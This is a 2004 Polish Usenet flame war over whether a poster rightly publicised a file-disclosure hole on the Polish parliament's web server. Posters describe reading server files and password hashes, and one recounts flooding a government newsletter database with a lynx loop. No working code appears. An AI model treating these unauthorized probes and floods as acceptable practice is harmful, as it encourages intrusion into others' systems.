az do klimatyzowanych serwerowni i luksusowych gabinetow prezesow.
> Swe żale skieruj do swego reprezentatna w parlamencie i spróbuj
> na nim wymóc działania, aby to poprawić.
I odpowie mi mniej wiecej tak jak admin rzadowego serwera? Czyli dostane "brak
odpowiedzi".
Moja mysl przewodnia generalnie jest taka: zapobiegac jest lepiej (taniej,
skuteczniej, itp) niz leczyc. I denerwuje mnie podejscie "lepiej nic nie robic
i siedziec cicho" - bo od tego nic sie na lepsze nie zmieni...
Pozdr
b
websafe
> Dnia 16 Aug 2004 13:58:02 +0200, Grzegorz Krzemieniecki spłodził(a):
>>Myślę, że pod tym adresem znajdzie Pan właściwą osobę do poinformowania o całej
>>sprawie: http://www.sejm.gov.pl/kancelaria/podstrony/oi.htm
> Dzięki, info poszło.
Dokładnie :) Gadanie z osobą bezpośrednio odpowiedzialną
nie ma sensu, bo będzie starała się ukryć swoją niekompetencję.
Trzeba "walić" na samą górę :) wtedy są efekty. Choc czasem też
zabawne. Ja swego czasu wykryłemn (wow! chaker ;) "dziurę"
w systemie subskrybcyjnym jednej z "rządowych" stron i pisałem
do nich po dobroci, żeby coś z tym zrobili :) z przykładami,
grzecznie, ze wskazówkami. Oni nic. Potem im udowodniłem,
że system jest do bani - przy pomocy prostego skryptu w bashu,
który co sekundę dopisywał mój adres email z kolejnym numerem
do ich bazy (wywołanie w pętli lynx'a url + parametry ;)
Jak miło potem było otrzymywać (catch-all) kilka tysięcy kopii
tego samego newslettera :> Same dziura w ich systemie to było
jedno, bo mieli powazne problemy ze znajomością RFC 822 :>
Oferowałem swoją pomoc w napisaniu w miarę bezpiecznego
skryptu w zamian za to, że przekażą kwotę w wysokości miesięcznego
wynagrodzenia ich informatyka na konkretny dom dziecka w Opolu.
Zero reakcji, zero odpowiedzi. Po jakimś czasie zauważyłem,
że owszem :> zmienili skrypt subskrybcji :> i teraz już jest
trudniej dopisać kogoś bez jego wiedzy :> ale w bardzo przyjemny
i zautomatyzowany sposób można wypisać wszystkich z ich bazy
:) bueheheh. A do RFC dalej nie zajrzeli a wiedzę czerpią
chyba z najprostszych przykładów na stronie php.net :>
Sprawe olałem ze względu na brak sensownej reakcji
z ich strony - szkoda mojego czasu. Ktoś ich kiedyś "wysadzi" :)
to wtedy zrozumieją :) A upubliczniać tego też nie miałem
i nadal nie mam zamiaru - bo po co kogoś prowokować
do destrukcyjnych działań :)
pozdrówka
Łukasz Grochal
> Posłałbym na pl.rec.humor.najlepsze, ale tam niestety przepuszczają
> tylko śmieszne, żałosnych nie chcą. Cóż, takie życie... :->
A mnie to trochę smuci... bo już jestem w takim wieku, że kolejne
młode zdążyło już odrosnąć od ziemi i podskakuje bez zastanowienia,
myśląc że pozjadało wszystkie rozumy. I tak mi trochę brakuje jakiegoś
sieciowego odpowiednika siwizny albo długiej brody... żeby młode na
pierwszy rzut oka widziało, że jeśli może czasami nie w wiedzy, to
w doświadczeniu i umiejętności zrzędzenia z pewnością do pięt nie
dorasta ;>
--
(-) Łukasz Grochal lukie [at] berdyczow.org
_________________________________________ (PGP key / SSL cert itp.)
Masz prawo zachować milczenie. Wszystko, \____ http://www.berdyczow.org/ __
co powiesz, może i zostanie przekręcone, a następnie użyte przeciwko Tobie.
Ola Michnowicz
Małgorzata Krzyżaniak napisał(a):
> Zasadniczy problem jest taki, że ja nijak tej jakże chwalebnej postawy
> opisanej przez Ciebie u inicjatora wątku nie widzę. Raczej "Znalazłem
>>>dziurę<<, a jak nie poprawicie, to Wam narobię trzody"... Ale
> moja chata z kraja, widać fajnie być chackerem ;-)
Cóz, ja widze chęć napiętnowania niedbałości admina, z konkretnym
wskazaniem jak - poprzez artykuł w prasie. Realizowane raczej
przyzwoicie - bo najpierw dziura została zgłoszona do admina, żeby mógł
ją po cichu załatać - i sprawy by nie było. Facet zgłoszenie potraktował
w sposób wybitnie lekceważący, co dla mnie jest skandalem w przypadku
serwera publicznego, do tego reprezentującego najpowazniejszą instytucję
w państwie, tudzież w przypadku admina opłacanego z publicznych
pieniędzy.
Natomiast postawy "rozpier**** im wszystko, pokażę jaki to ja jestem
chakier" - za cholere nie dostrzegam. Toć sam jasnie pan admin
stwierdził, że informacje opublikowane w liście inicjującym wątek nijak
nie pozwalają na zrobienie kuku serwerowi...
Robert Rędziak (prawdziwego adresu szukaj w sygnaturce)
<barb...@WYTNIJ.gazeta.pl> wrote:
> Odsunac od decyzji ludzi, ktorzy nie potrafia myslec perspektywicznie. Oto
> lekarstwo. Recepta jest prosta i dziala od chlewu czy stajni, poprzez urzedy
> az do klimatyzowanych serwerowni i luksusowych gabinetow prezesow.
Go ahead, make my day.
Asia Jedrychowska
> Cóz, ja widze chęć napiętnowania niedbałości admina, z konkretnym
> wskazaniem jak - poprzez artykuł w prasie. Realizowane raczej
> przyzwoicie - bo najpierw dziura została zgłoszona do admina, żeby mógł
> ją po cichu załatać - i sprawy by nie było. Facet zgłoszenie potraktował
> w sposób wybitnie lekceważący, co dla mnie jest skandalem w przypadku
> serwera publicznego, do tego reprezentującego najpowazniejszą instytucję
> w państwie, tudzież w przypadku admina opłacanego z publicznych
> pieniędzy.
Zamień "admina" na "szefa IT" i prawdopodobnie będziesz mieć rację w
powyższym paragrafie. Nie wiem, skąd wy wszyscy wzięliście koncept Admina
Wszechmogącego. To nie uniwerek czy firma Pipsztok i spółka.
> Natomiast postawy "rozpier**** im wszystko, pokażę jaki to ja jestem
> chakier" - za cholere nie dostrzegam. Toć sam jasnie pan admin
> stwierdził, że informacje opublikowane w liście inicjującym wątek nijak
> nie pozwalają na zrobienie kuku serwerowi...
A nieubezpieczone samochody wolno kraść.
Ola Michnowicz
Małgorzata Krzyżaniak napisał(a):
>> Jednak to server polskiego Sejmu. Wiec przykro by bylo gdyby tam
>> porno-strony sie pojawily.
>
> No, jakże aktywne upublicznianie >>dziury<< jest niejako zachętą do
> takich zabaw.
Iście gatesowska filozofia. Czy gdyby autor watku o dziurze nie napisał,
to dzięki temu ona by cudownie znikneła i nikt inny już nigdy by na nią
nie trafił? Niestety, kto chce się "wykazać jaki to on chakier" i szuka
dziur, ten zwykle znajduje. Niezależnie od tego, czy ktos wcześniej
opisał podatność akurat tej konkretnej maszyny, czy nie.
A moze stanie się cud, i takie otwarte napiętnowanie sprawi, ze szkodnik
nie bedzie miał czego szukac?
Ola Michnowicz
Jedrychowska napisał(a):
> Zamień "admina" na "szefa IT" i prawdopodobnie będziesz mieć rację w
> powyższym paragrafie. Nie wiem, skąd wy wszyscy wzięliście koncept Admina
> Wszechmogącego.
Bo to zwykle tym co sa najbliżej danej sprawy rzeczywiscie na niej
zależy. Dyrektorzy, zwłaszcza ci w administracji rządowej, sa od
"kreowania wizji", "wytyczania kierunków rozwoju" oraz (last but not
least) trzymania się pazurami swojej intratnej posady, Zwłaszcza jesłi
mają ją po znajomości lub z politycznego nadania i tak własciwie to nie
bardzo mają pojęcie, co ma robić ich urzad. A admini są od realizacji. I
to od nich zalezy rzeczywista jakośc rozwiazania.
W żadnym ze znanych mi podobnych przypadków nie skutkowała rozmowa z
władzą najwyższą, natomiast własnie admini stawiali sobie za punkt
honoru żeby w "ich" sieci wszystko banglało ok. I robili całkiem niezłe
sztuki, zeby naprawić błedy chocby tylko tymi dostępnymi sobie środkami.
Ale ok, możemy zamienić admina na szefa IT. W kazdym razie ktoś jest za
to odpowiedzialny i powinno się o tym kimś powiedzieć głosno, ze
wykonuje swoją pracę w sposób niedbały.
> A nieubezpieczone samochody wolno kraść.
Nie. Ale jak najbardziej wolno spojrzeć na te pypki w drzwiach i zwrócić
uwage właścicielowi, że zostawił auto na parkingu otwarte.
zYm3N
spłodził(a):
>>> No, jakże aktywne upublicznianie >>dziury<< jest niejako zachętą do
>>> takich zabaw.
>> Jeżeli po cichu nie poskutkowało, to jestem jak najbardziej za aktywnym
>> upublicznianiem. Zachętą do takich zabaw to raczej jest niełatanie dziur.
>
> A ja widzę całą gamę możliwości pomiędzy. Acz nie są one tak widowiskowe
Mógłbym prosić o przykłady ?
Przy następnym błędzie i ewentualnym braku kontaktu ze strony
zainteresowanych, może wykorzystam...
zYm3N
> Wed, 18 Aug 2004 06:12:54 +0000 (UTC), na pl.internet.mordplik,
> Małgorzata Krzyżaniak napisał(a):
>
>> Czyli na siłę. Skoro nie odpowiedział, to nie prościej przestać pomagać?
>
> Tylko, że to nie jest prywatny serwer sieci trzepak z Koziej Wólki, a
> serwer naszego Sejmu. Ciała (jakoby) reprezentującego Naród. Czyli, w
> pewnym sensie, wizytówka wszystkich ludzi z polskim paszportem. Nie wiem
> jak Tobie, ale mnie byłoby ciut głupio, gdyby jutro pojawiła się tam
> wywieszka "hacked by gumisie" i link do strony z pornografią dziecięcą.
>
> Tak, wiem, patriotyzm i takie tam podobne zdecydowanie nie są cool w
> dzisiejszych czasach... ale bądź wyrozumiała i okaż trochę tolerancji
> dla dinozaurów.
Czyli jednak są ludzie, którzy rozumieją.. wazelinka - nie, nie w sensie
'wazelinka', bo mała.. wazelinka, bo taka przyjemniutka :-) - dla Ciebie
... dzięki. :-]
zYm3N
>> Tak, wiem, patriotyzm i takie tam podobne zdecydowanie nie są cool w
>> dzisiejszych czasach... ale bądź wyrozumiała i okaż trochę tolerancji
>> dla dinozaurów.
>
> Interesujące, bardzo... A ja kilka dni temu odkryłam dziursko w aplikacji
> www jednego z urzędów miasta, w którym mieszkam. Jako że nie mam zapędów na
> wannabe chakiera czy wandala, pooglądałam sobie parę rzeczy "od kuchni",
> pośmiałam się z lamerstwa urzędoadminów przez chwilę z najbliższymi osobami
"Kto używa słowa lamer na określenie innej osoby sam się nim staje.."
> i zostawiłam sprawę w spokoju. Być może powinnam była tam pokasować czy
> poprzestawiać parę rzeczy, czy też umieścić coś w rodzaju "0wn3d by asiak",
Nie. Powinnaś była napisać do administratora serwisu i poinformować go o
błędzie. To też człowiek, też może sie mylić.. ale Ty pokazałaś jaka to
jestes cHAKERKA, pośmiałaś się z 'malutkiego' (l)adminka...
> bo tak by było patriotyczniej? Nie ukrywam, korciło mnie, żeby wysłać info
> o dziurze znajomemu pismakowi z bulwarówki, ale wyłącznie z racji czysto
> ludzkiej chęci dokopania administracji, która jest mi nie po linii. Nie
> mieszałabym do tego patriotyzmu, bo to zalatuje o, taką hipokryzją.
Heh.. ale zgnoić.. tak ? :> Zgnoić potężnie.. pokazać jacy Ci skurw*ni są
słabi.. ha ! to ja jestem najlepsza.. oj..
zYm3N
spłodził(a):
>> I czujesz sie z tym dobrze. A teraz sobie pomysl, ze jakis skosnooki
>> (teroretyzuje) chakier, nie bedzie mial tyle sentymentow co ty. Wezmie co
>> bedzi emogl wziac, zniszczy co bedzi emogl zniszczyc, oflaguje serw jako
>> zdobyty. Kolejna wiesc obiegnie swiat. A w urzedzie, zamiast zapobiegac niskim
>> kosztem, rozpeta sie leczenie kosztem wysokim...
>
> Och jej. Normalnie posikałem się w majtki... Dziura była tak
Polecam pampersy.
> cholernie krytyczna, że dwudzieste pokolenie moich potomków
> będzie zapieprzało za darmo u Chińczyków, żeby pokryć straty
> naszego kochanego UM.
Czyli, że się nie znasz, albo jesteś na tyle niepoważny, że trolujesz..
może dla przyjemności ?
Asia Jedrychowska
[...piaskownica wycięta]
> błędzie. To też człowiek, też może sie mylić.. ale Ty pokazałaś jaka to
> jestes cHAKERKA, pośmiałaś się z 'malutkiego' (l)adminka...
[...]
> Heh.. ale zgnoić.. tak ? :> Zgnoić potężnie.. pokazać jacy Ci skurw*ni są
> słabi.. ha ! to ja jestem najlepsza.. oj..
Przypominam, że w przeciwieństwie do Ciebie ja _nie_ spamuję swoimi
rewelacjami połowy usenetu i _nie_ odgrażam, że upublicznię wspomnianą
dziurę w mediach. I tak trochę nie wierzę w Twoje szlachetne pobudki, ba:
sądzę, że to, co zacytowane wyżej, to projekcja Twoich odczuć.
zYm3N
>>> cholernie krytyczna, że dwudzieste pokolenie moich potomków
>>> będzie zapieprzało za darmo u Chińczyków, żeby pokryć straty
>>> naszego kochanego UM.
>>
>> Czyli, że się nie znasz, albo jesteś na tyle niepoważny, że trolujesz..
>> może dla przyjemności ?
>
> Nie, Robert - w przeciwieństwie do Ciebie - wie, o czym mówi, bo mu
> powiedziałam. Dziura istotnie krytyczna nie była. Dość obciachowa, ale
> niewiele ponad to.
Okey. Udowodnijmy to, że dziura nie była krytyczna. Ja jestem zdania, że
była. Przekonaj mnie, że się mylę.
1. Dziura w skrypcie umożliwiała odczytanie dowolnego pliku znajdującego
się na serwerze, który miał przynajmniej możliwość odczytu dla wszystkich
użytkowników.. Czyli możliwość czytania wszystkiego, co mógł czytać
użytkownik 'apache'.
2. W pliku /etc/passwd leżały luzem zakodowane hasła.. brute force w takim
wypadku to kwestia czasu.
Jeśli obronisz się z tego ostatniego, i udowodnisz, że pokazywanie na
zewnątrz haseł nie jest *poważną* dziurą w bezpieczeństwie systemu.. no to
sory..
Daj hasło - zaszyfrowane.. - do swojego konta pocztowego.. Daj także
algorytm wg, którego szyfrowałaś..
zYm3N
>> błędzie. To też człowiek, też może sie mylić.. ale Ty pokazałaś jaka to
>> jestes cHAKERKA, pośmiałaś się z 'malutkiego' (l)adminka...
> [...]
>> Heh.. ale zgnoić.. tak ? :> Zgnoić potężnie.. pokazać jacy Ci skurw*ni są
>> słabi.. ha ! to ja jestem najlepsza.. oj..
>
> Przypominam, że w przeciwieństwie do Ciebie ja _nie_ spamuję swoimi
> rewelacjami połowy usenetu i _nie_ odgrażam, że upublicznię wspomnianą
Ten spam odniósł zamierzony skutek. Odpowiednie 'przegródki do góry' się
poruszyły.. efekt osiągnięty..
> dziurę w mediach. I tak trochę nie wierzę w Twoje szlachetne pobudki, ba:
Nieraz trzeba zagrozić, żeby otrzymać co się chce.. - rozwiązanie problemu.
> sądzę, że to, co zacytowane wyżej, to projekcja Twoich odczuć.
Przecież ja to pisałem o Tobie. Czytać ze zrozumieniem nie potrafisz ?
Wiesz.. wierzyć.. IMHO to Ty nie musisz wierzyć w nic.. to akurat mało co
mnie obchodzi. Ważne są fakty.
marcin_...@poczta.onet.pl
>
> Nie. Ale jak najbardziej wolno spojrzeć na te pypki w drzwiach i zwrócić
> uwage właścicielowi, że zostawił auto na parkingu otwarte.
ta.... a jak odpowie, ze zostawia, bo tego grata to i tak nikt nie ukradnie, to
wtedy rozwiesic w calym miescie na drzewach informacje "kowalski zostawia
otwarty samochod, zwrocilem mu uwage, a on mnie olal!"
nadgorliwosc gorsza od faszyzmu....
do zymena: stary daj se siana...
do ludzi: ale wykrecony gosciu?! wykrylem dziure jestem wielkim bohaterem
bede pisal do gazeta... dziura... dziura... znam haslo admina...
--
Wysłano z serwisu OnetNiusy: http://niusy.onet.pl
marcin_...@poczta.onet.pl
> błędzie. To też człowiek, też może sie mylić.. ale Ty pokazałaś jaka to
> jestes cHAKERKA, pośmiałaś się z 'malutkiego' (l)adminka...
no tak... posmiala sie w zaciszu wlasnego mieszkanka z adminka lamerka i nie
zostala super bohaterka niusow... zaden porzadny hakier nie przepuscilby takiej
okazji...
zymen, czy ty aby nie jestes z samoobrony??? pierwszy post w tym watku wskazuje
na to jednoznacznie, a pozostale utwierdzaja mnie w tym przekonaniu!
Robert Rędziak (prawdziwego adresu szukaj w sygnaturce)
wrote:
> Okey. Udowodnijmy to, że dziura nie była krytyczna. Ja jestem zdania, że
> była. Przekonaj mnie, że się mylę.
Chłopaku z pryszczami [1] większymi niż moja głowa. Przestań
wstrząsać powietrze i daj sobie siana. Nie masz zielonego
pojęcia o sprawie, o której pisała Asia, przeczytałeś raptem
parę zdań na newsach i nadmiar hormonów spowodował u Ciebie
wzmożoną aktywność umysłową. Polecam Ci spacer, książkę, trochę
sportu, lub/i trochę seksu -- wyluzujesz się.
> Jeśli obronisz się z tego ostatniego, i udowodnisz, że pokazywanie na
> zewnątrz haseł nie jest *poważną* dziurą w bezpieczeństwie systemu.. no to
> sory..
1. Asia wspomniała o dziurze, którą sama znalazła. Ta nie była
*krytyczna*. Ale nie przeszkadza Ci to tryskać.
2. Pokazywanie haseł na zewnątrz może być problemem, a może nie.
To zależy od zdania właściciela serwera na ten temat.
> Daj hasło - zaszyfrowane.. - do swojego konta pocztowego.. Daj także
> algorytm wg, którego szyfrowałaś..
Odkryłeś wczoraj Jasia Rozpruwacza i uprawiasz luftbrandzlung?
r. (FUT: poster)
[1] -- pryszczerstwo to stan umysłu, nie cery, choć często
występuje w parze z rzeczywistym.
Ola Michnowicz
marcin_...@poczta.onet.pl napisał(a):
> ta.... a jak odpowie, ze zostawia, bo tego grata to i tak nikt nie ukradnie, to
> wtedy rozwiesic w calym miescie na drzewach informacje "kowalski zostawia
> otwarty samochod, zwrocilem mu uwage, a on mnie olal!"
Jeśli Kowalski jest ministrem i zostawia otworem służbowego grata
finansowanego z publicznych pieniędzy, to owszem, tak. Bo to nie
Kowalski prywatnie będzie płacił za nowy, jeśli go gwizdną, tylko
podatnicy. Nie wiem, jak Ty, ale ja uważam, ze podatki już są
wystarczająco wysokie, nie ma potrzeby ich podnosic.
> nadgorliwosc gorsza od faszyzmu....
Czyżby? Zainteresowanie sprawami publicznymi, troska o coś, co jest
poniekąd dobrem wspólnym, to czepianie i faszyzm? To chyba faktycznie,
normalnym krajem będziemy dopiero za trzy pokolenia, jak te
komunistyczne naleciałości w końcu wywietrzeją.
Ale z mojej strony EOT, bo OT.
zYm3N
spłodził(a):
>> Nie. Ale jak najbardziej wolno spojrzeć na te pypki w drzwiach i zwrócić
>> uwage właścicielowi, że zostawił auto na parkingu otwarte.
>
> ta.... a jak odpowie, ze zostawia, bo tego grata to i tak nikt nie ukradnie, to
> wtedy rozwiesic w calym miescie na drzewach informacje "kowalski zostawia
> otwarty samochod, zwrocilem mu uwage, a on mnie olal!"
>
> nadgorliwosc gorsza od faszyzmu....
tak.. :> Lubię ludzi, którzy dopasowywują teksty do sytuacji, mimo, iż mają
one troszkę inne znaczenia.. a zresztą o priorytetowości słyszałeś ? :-)
> do zymena: stary daj se siana...
Nie.
> do ludzi: ale wykrecony gosciu?! wykrylem dziure jestem wielkim bohaterem
> bede pisal do gazeta... dziura... dziura... znam haslo admina...
Czytałes kiedyś i inżynierii socjalnej ? Wpływ na ludzi. teoria i praktyka
:> Właśnie to zrobiłem.. O poście dużo ludzi zaczęło mówić, i doszło to od
odpowiednich ludzi.. prawidłowe działania zostały już poczynione.. :]]]
Niestety to ma także skutki uboczne.. jesteś jednym z nich :>
Robert Rędziak (prawdziwego adresu szukaj w sygnaturce)
<spam...@dioda.net> wrote:
> Czyżby? Zainteresowanie sprawami publicznymi, troska o coś, co jest
> poniekąd dobrem wspólnym, to czepianie i faszyzm?
Szczególnie gdy to zainteresowanie wynika z tych samych pobudek
co działalność lepperystów i tzw. tabloidów.
r.
Robert Rędziak (prawdziwego adresu szukaj w sygnaturce)
wrote:
> O poście dużo ludzi zaczęło mówić, i doszło to od
> odpowiednich ludzi..
Dostałeś kolumnę w Fakcie?
r. (fut: poster)
Asia Jedrychowska
> > sądzę, że to, co zacytowane wyżej, to projekcja Twoich odczuć.
> Przecież ja to pisałem o Tobie.
Och, ja wiem, że pisałeś o mnie. Znasz znaczenie słowa "projekcja"?
> Czytać ze zrozumieniem nie potrafisz ?
Look who's talking.
Serdeczności i FUT: poster
zYm3N
spłodził(a):
>> Nie. Powinnaś była napisać do administratora serwisu i poinformować go o
>> błędzie. To też człowiek, też może sie mylić.. ale Ty pokazałaś jaka to
>> jestes cHAKERKA, pośmiałaś się z 'malutkiego' (l)adminka...
>
> no tak... posmiala sie w zaciszu wlasnego mieszkanka z adminka lamerka i nie
> zostala super bohaterka niusow... zaden porzadny hakier nie przepuscilby takiej
> okazji...
Tak. Zostawiła potencjalna możliwość dla dzieciaka, ktory nie będzie na
tyle wyrozumiały co ona.. I zmieni.. albo nawet uszkodzi serwis. I co wtedy
? Fajnie..
> zymen, czy ty aby nie jestes z samoobrony??? pierwszy post w tym watku wskazuje
> na to jednoznacznie, a pozostale utwierdzaja mnie w tym przekonaniu!
Nie. Nie jestem z samoobrony. Jakoś czerwono-biało-czerwone krawaciki mnie
nie interesują.
Dlaczego próba naprawienia czegoś, szukania pomocy, spotyka się z takim
odrzuceniem i potępieniem przez społeczeństwo ?
Jak Wy byście zareagowali ?
zYm3N
spłodził(a):
>> Czyżby? Zainteresowanie sprawami publicznymi, troska o coś, co jest
>> poniekąd dobrem wspólnym, to czepianie i faszyzm?
>
> Szczególnie gdy to zainteresowanie wynika z tych samych pobudek
> co działalność lepperystów i tzw. tabloidów.
Kto to są tabloidzi, bo nie wiem ?
MF
> On Thu, 19 Aug 2004 12:56:40 +0200, zYm3N <zy...@interia.pl>
> wrote:
>
>
>>O poście dużo ludzi zaczęło mówić, i doszło to od
>>odpowiednich ludzi..
>
>
> Dostałeś kolumnę w Fakcie?
>
> r. (fut: poster)
Pewnie dostał .... a UOP i MSW juz maja jego psa i swiadectwo z I
komunii :-)
Co za dzien ..........
--
/pozdrawiam
MF
>> jak to sie stalo ze jest zielone?? a no q...a stalo sie i juz!!<<
Miros/law L. Baran
> Kto to są tabloidzi, bo nie wiem ?
'tabloidy'. Liczba mnoga od 'tabloid'.
HTH
Jubal
--
[ Miros/law L Baran, baran-at-knm-org-pl, neg IQ, cert AI ] [ 0101010 is ]
[ BOF2510053411, makabra.knm.org.pl/~baran/, alchemy pany ] [ The Answer ]
He who knows that enough is enough will always have enough.
zYm3N
>> On Thu, 19 Aug 2004 12:56:40 +0200, zYm3N <zy...@interia.pl>
>> wrote:
>>
>>
>>>O poście dużo ludzi zaczęło mówić, i doszło to od
>>>odpowiednich ludzi..
>>
>>
>> Dostałeś kolumnę w Fakcie?
>>
>> r. (fut: poster)
>
> Pewnie dostał .... a UOP i MSW juz maja jego psa i swiadectwo z I
> komunii :-)
I komunii to się ma najwyżej pamiątkę :P Żadnego świadectwa nie dostałem..
hm, a może inna religia ? Ja: chrześcijańska. Z oddziałem głównym w
Watykanie =]
zYm3N
> 31337 zYm3N pisze:
nice :-)
>> Kto to są tabloidzi, bo nie wiem ?
>
> 'tabloidy'. Liczba mnoga od 'tabloid'.
Przepraszam i dziękuję za korektę.
MF
> Dnia Thu, 19 Aug 2004 13:21:15 +0200, MF spłodził(a):
>
>
>>>On Thu, 19 Aug 2004 12:56:40 +0200, zYm3N <zy...@interia.pl>
>>>wrote:
>>>
>>>
>>>
>>>>O poście dużo ludzi zaczęło mówić, i doszło to od
>>>>odpowiednich ludzi..
>>>
>>>
>>> Dostałeś kolumnę w Fakcie?
>>>
>>> r. (fut: poster)
>>
>>Pewnie dostał .... a UOP i MSW juz maja jego psa i swiadectwo z I
>>komunii :-)
>
>
> I komunii to się ma najwyżej pamiątkę :P Żadnego świadectwa nie dostałem..
> hm, a może inna religia ? Ja: chrześcijańska. Z oddziałem głównym w
> Watykanie =]
>
... ale psa dorwali?
EOT <lol>
Łukasz Grochal
> Dnia Wed, 18 Aug 2004 20:29:48 +0000 (UTC), Asia Jedrychowska spłodził(a):
>> Nie, Robert - w przeciwieństwie do Ciebie - wie, o czym mówi
[...]
> Daj hasło - zaszyfrowane.. - do swojego konta pocztowego.. Daj także
> algorytm wg, którego szyfrowałaś..
...i cycka! Cycka też daj, wreszcie coś się będzie działo!
/me, który właśnie dostał w prezencie będącą hitem sezonu tu nad
morzem trąbę. Jaka szkoda, że po sieci nie da się niektórym
solidnie trąbnąć.
--
(-) Łukasz Grochal lukie [at] berdyczow.org
___________________ (PGP key / SSL cert itp.)
W miarę możliwości \__________________________ http://www.berdyczow.org/ __
traktuj każdego nowo poznanego jak złośliwego głupca. /Jacek Bocheński/
Pet.
Łukasz Grochal <lukie...@pisz.do.mnie.na.berdyczow.org>
napisał(a):
> /me, który właśnie dostał w prezencie będącą hitem sezonu tu nad
> morzem trąbę. Jaka szkoda, że po sieci nie da się niektórym
> solidnie trąbnąć.
Oj, przecież trąbisz tu już tak długo, że na pewno wszyscy się już
nasłuchali. Wziął byś teraz tą swoją trąbę gdzieś indziej, co?
Pozdr.Pet.
Pet.
Dariusz Laskowski <dar...@post.pl> napisał(a):
> On Thu, 19 Aug 2004 16:41:51 +0200, Pet. wrote:
>
> >> /me, który właśnie dostał w prezencie będącą hitem sezonu tu nad
> >> morzem trąbę. Jaka szkoda, że po sieci nie da się niektórym
> >> solidnie trąbnąć.
>
> > Oj, przecież trąbisz tu już tak długo, że na pewno wszyscy się już
> > nasłuchali. Wziął byś teraz tą swoją trąbę gdzieś indziej, co?
>
> Ale tu jest całkiem niezła akustyka. :-P
Owszem, na echo nie ma co narzekać, a i trąba niejedna.
Pozdr.Pet.
Łukasz Grochal
>> Ale tu jest całkiem niezła akustyka. :-P
> Owszem, na echo nie ma co narzekać, a i trąba niejedna.
Ano właśnie. I gdyby nie to, że chordofony z przeciwka znowu grają,
jakby w życiu partytury na oczy nie widziały, to byłoby całkiem
przyjemnie. ;>
--
(-) Łukasz Grochal lukie [at] berdyczow.org
(for PGP key visit:)
____________________________________________ http://www.berdyczow.org/ __
Całe szczęście jeszcze, że one chcą mężczyzn i zależy im na nich. JCh
Jakub K. Boguslaw
w sygnaturce) <spam_go...@supersonic.plukwa.net> wrote:
>
> 2. Pokazywanie haseł na zewnątrz może być problemem, a może nie.
> To zależy od zdania właściciela serwera na ten temat.
A czy pokazywanie na zewnatrz zawartosci plikow z logami oraz
konfiguracji serwera stanowi zagrozenie dla bezpieczenstwa czy tez
nie?
Pozdrawiam,
Madej
--
Jakub K. Boguslaw | < madej at aster pl > | NSA
Na newsy pisze calkowicie prywatnie.
Adam Wysocki
> Bo to serwer krajowy. Lubię pomagać. No i domenka gov.pl :] Mała mgiełka
> tajemnicy :-)
Wydoroślej.
Już nawet pomijając wszystko inne, w jaki sposób chciałbyś przejąć
kontrolę nad tym serwerem? Zalogować się na roota? A jak się niby
zalogujesz? Wrzucić jakieś pliki? Nadal pytam - w jaki sposób? Tam
i tak nie ma nic tajemniczego, co mogło wyciec a nie powinno, więc
cała sprawa jest jak dla mnie próbą zaistnienia z twojej strony.
--
Adam Wysocki * Warszawa, Centrum * www.gophi.net * #tygryski @ efnet
GG 1234 * GSM +48508878856 * go...@linux.net.pl * go...@gadu-gadu.pl
rozmawiamy o tobie, to ty jestes grupowym exhibicjonista (C) meganka
Adam Wysocki
> Czytałes kiedyś i inżynierii socjalnej ? Wpływ na ludzi. teoria i praktyka
> :> Właśnie to zrobiłem.. O poście dużo ludzi zaczęło mówić, i doszło to od
> odpowiednich ludzi.. prawidłowe działania zostały już poczynione.. :]]]
Haksior normalnie.
Lecz się.
--
Adam Wysocki * Warszawa, Centrum * www.gophi.net * #tygryski @ efnet
GG 1234 * GSM +48508878856 * go...@linux.net.pl * go...@gadu-gadu.pl
Gustownie różowy death, kurna, metal... (C) xemon @ apcoh 4 May 2003
Adam Wysocki
> 2. W pliku /etc/passwd leżały luzem zakodowane hasła.. brute force w takim
> wypadku to kwestia czasu.
>
> Jeśli obronisz się z tego ostatniego, i udowodnisz, że pokazywanie na
> zewnątrz haseł nie jest *poważną* dziurą w bezpieczeństwie systemu..
> no to sory..
W jaki sposób chciałbyś się zalogować na tą maszynę? Konkretnie.
--
Adam Wysocki * Warszawa, Centrum * www.gophi.net * #tygryski @ efnet
GG 1234 * GSM +48508878856 * go...@linux.net.pl * go...@gadu-gadu.pl
Feel free to mail me, and I'll feel free to ignore you. (C) Torvalds
Adam Wysocki
> "Kto używa słowa lamer na określenie innej osoby sam się nim staje.."
Gdzie to wyczytałeś?
--
Adam Wysocki * Warszawa, Centrum * www.gophi.net * #tygryski @ efnet
GG 1234 * GSM +48508878856 * go...@linux.net.pl * go...@gadu-gadu.pl
Paweł Goleń
> Dlaczego próba naprawienia czegoś, szukania pomocy, spotyka się z takim
> odrzuceniem i potępieniem przez społeczeństwo ?
Może dlatego, że błąd, który wykorzystałeś opisany jest od lat czterech?
--
Paweł Goleń
mailto:p_g...@ks.onet.pl
Specjalne pozdrowienia dla mojego prywatnego trola!
UGVybCBTVUNLUw==
Jakub K. Boguslaw
Wysocki) wrote:
>
>Już nawet pomijając wszystko inne, w jaki sposób chciałbyś przejąć
>kontrolę nad tym serwerem? Zalogować się na roota?
Akurat na ten konkretny serwer to juz nie ma po co sie logowac:
wiekszosc ciekawych informacji mozna odczytac via www :-)
>Tam i tak nie ma nic tajemniczego,
W sumie informacje o konfiguracji sieci lokalnej, informacje o ruchu
pocztowych, dane o tym kto, skad i kiedy sie logowal to nic waznego,
tajemniczego i do niczego nikomu nie jest przydatne :-)
Łukasz Grochal
>> "Kto używa słowa lamer na określenie innej osoby sam się nim staje.."
> Gdzie to wyczytałeś?
Tam zaraz wyczytał... nigdy do przedszkola nie chodziłeś, nie
pamiętasz?
"Kto się sam przezywa, ten się sam nazywa" - ostatnia deska ratunku
gdy już komuś w zabawie w przezywanie weny brakło :>
--
(-) Łukasz Grochal lukie [at] berdyczow.org
(PGP key / SSL cert itp.)
______________________________________________ http://www.berdyczow.org/ __
Mój Boże! Jacyż ci inteligentni ludzie są głupi! /P. Choderlos De Laclos/
OGONek~
> Dlaczego próba naprawienia czegoś, szukania pomocy, spotyka się z
> takim odrzuceniem i potępieniem przez społeczeństwo ?
> Jak Wy byście zareagowali ?
Nie spoleczenstwo - nie uogolniaj
--
OGONek~
zYm3N
>> Czytałes kiedyś i inżynierii socjalnej ? Wpływ na ludzi. teoria i praktyka
>>:> Właśnie to zrobiłem.. O poście dużo ludzi zaczęło mówić, i doszło to od
>> odpowiednich ludzi.. prawidłowe działania zostały już poczynione.. :]]]
>
> Haksior normalnie.
>
> Lecz się.
Eh.. Jesteś znany jako osoba zajmująca się bezpieczeństwem. Rzekłbym jeden
z lepszych. Jak Ty byś się zachował ?
--
Faja Bogusław
